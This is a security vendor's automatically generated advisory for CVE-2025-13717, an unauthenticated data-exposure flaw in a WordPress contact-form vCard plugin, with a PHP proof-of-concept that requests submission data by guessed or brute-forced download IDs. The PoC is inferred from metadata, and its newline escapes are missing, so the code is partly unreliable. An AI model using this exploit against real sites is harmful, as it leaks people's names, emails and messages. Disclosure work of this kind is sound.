Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-13717: Contact Form vCard Generator <= 2.4 – Missing Authorization to Unauthenticated Sensitive Information Exposure via 'wp-gvc-cf-download-id' Parameter (contact-form-vcard-generator)

CVE ID CVE-2025-13717
Plugin contact-form-vcard-generator
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 2.4
Patched Version
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13717 (metadata-based):
This vulnerability is an unauthenticated sensitive information exposure in the Contact Form vCard Generator WordPress plugin. The flaw resides in the plugin’s download request handler, allowing attackers to export Contact Form 7 submission data without authentication. The CVSS 5.3 score reflects a moderate confidentiality impact with no authentication requirements.

CWE-862 (Missing Authorization) indicates the plugin’s download function lacks proper capability checks. The description specifically mentions the ‘wp_gvccf_check_download_request’ function. Atomic Edge research infers this function is likely hooked to WordPress’s AJAX system or a custom endpoint. The function processes the ‘wp-gvc-cf-download-id’ parameter without verifying if the requesting user has permission to access the data. This pattern matches common WordPress plugin vulnerabilities where developers assume only authenticated users can reach certain endpoints.

Exploitation involves sending a request to the plugin’s download endpoint with a valid download ID parameter. The exact endpoint must be inferred. WordPress plugins commonly expose such functionality via admin-ajax.php with an action parameter derived from the function name. Attackers would target /wp-admin/admin-ajax.php with action=wp_gvccf_check_download_request and the wp-gvc-cf-download-id parameter. Alternatively, the plugin might use a custom admin-post.php endpoint or REST API route. Attackers can brute-force or guess download IDs to extract submission data.

Remediation requires adding proper authorization checks before processing download requests. The fix should verify current_user_can() with appropriate capabilities like ‘manage_options’ or a custom capability. The plugin must also validate the download ID parameter exists and belongs to the requesting user if user-specific data is involved. Nonce verification should be added to prevent CSRF attacks, though this vulnerability focuses on missing capability checks.

Successful exploitation exposes sensitive Contact Form 7 submission data. Attackers obtain names, phone numbers, email addresses, and message content. This constitutes a privacy violation under regulations like GDPR. Exposed email addresses enable phishing campaigns. Leaked personal information facilitates social engineering attacks. The data exposure is limited to submissions captured through Contact Form 7 forms configured with the vCard generator addon.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13717 - Contact Form vCard Generator <= 2.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'wp-gvc-cf-download-id' Parameter
<?php
/**
 * Proof of Concept for CVE-2025-13717
 * Assumptions based on vulnerability description:
 * 1. The vulnerable function 'wp_gvccf_check_download_request' is accessible without authentication
 * 2. The function processes the 'wp-gvc-cf-download-id' parameter
 * 3. WordPress AJAX pattern is used (most common for plugin download handlers)
 * 4. Download IDs are numeric or predictable
 */

$target_url = "https://example.com"; // CHANGE THIS

// The AJAX endpoint for unauthenticated requests
$ajax_url = $target_url . "/wp-admin/admin-ajax.php";

// Based on WordPress hook naming conventions, the AJAX action for
// 'wp_gvccf_check_download_request' would be 'wp_ajax_nopriv_wp_gvccf_check_download_request'
// The action parameter would be 'wp_gvccf_check_download_request'
$action = "wp_gvccf_check_download_request";

// Test with a sample download ID (attackers would brute-force or guess valid IDs)
$download_id = "1";

// Initialize cURL
$ch = curl_init();

// Set POST parameters
$post_data = array(
    'action' => $action,
    'wp-gvc-cf-download-id' => $download_id
);

// Configure cURL options
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 Atomic Edge PoC');

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Display results
echo "Atomic Edge CVE-2025-13717 PoCn";
echo "Target: " . $target_url . "n";
echo "HTTP Status: " . $http_code . "n";

if ($response !== false) {
    echo "Response Length: " . strlen($response) . " bytesn";
    
    // Check for indicators of successful exploitation
    if (strpos($response, 'VCARD') !== false || 
        strpos($response, 'BEGIN:VCARD') !== false ||
        strpos($response, 'FN:') !== false ||
        strpos($response, 'EMAIL:') !== false) {
        echo "[SUCCESS] vCard data likely exposedn";
        echo "First 500 chars of response:n" . substr($response, 0, 500) . "n";
    } else if (strpos($response, 'error') !== false || strpos($response, 'invalid') !== false) {
        echo "[INFO] Server returned error (try different download ID)n";
    } else {
        echo "[INFO] Raw response (may contain sensitive data):n" . $response . "n";
    }
} else {
    echo "cURL Error: " . curl_error($ch) . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School